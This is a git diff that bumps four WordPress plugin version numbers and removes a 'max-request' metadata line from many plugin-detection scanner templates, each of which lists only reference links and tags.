a/helpers/wordpress/plugins/google-site-kit.txt b/helpers/wordpress/plugins/google-site-kit.txt index be40cc4567..250205ed1c 100644 --- a/helpers/wordpress/plugins/google-site-kit.txt +++ b/helpers/wordpress/plugins/google-site-kit.txt @@ -1 +1 @@ -1.103.0 \ No newline at end of file +1.104.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/popup-maker.txt b/helpers/wordpress/plugins/popup-maker.txt index 5ce8b39599..753029c3a5 100644 --- a/helpers/wordpress/plugins/popup-maker.txt +++ b/helpers/wordpress/plugins/popup-maker.txt @@ -1 +1 @@ -1.18.1 \ No newline at end of file +1.18.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/webp-converter-for-media.txt b/helpers/wordpress/plugins/webp-converter-for-media.txt index 92666713cf..2151dbda1e 100644 --- a/helpers/wordpress/plugins/webp-converter-for-media.txt +++ b/helpers/wordpress/plugins/webp-converter-for-media.txt @@ -1 +1 @@ -5.9.1 \ No newline at end of file +5.9.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce.txt b/helpers/wordpress/plugins/woocommerce.txt index 72dfaf1650..a33192706f 100644 --- a/helpers/wordpress/plugins/woocommerce.txt +++ b/helpers/wordpress/plugins/woocommerce.txt @@ -1 +1 @@ -7.8.1 \ No newline at end of file +7.8.2 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index 425adf0bfe..e555bf93d3 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: - max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- 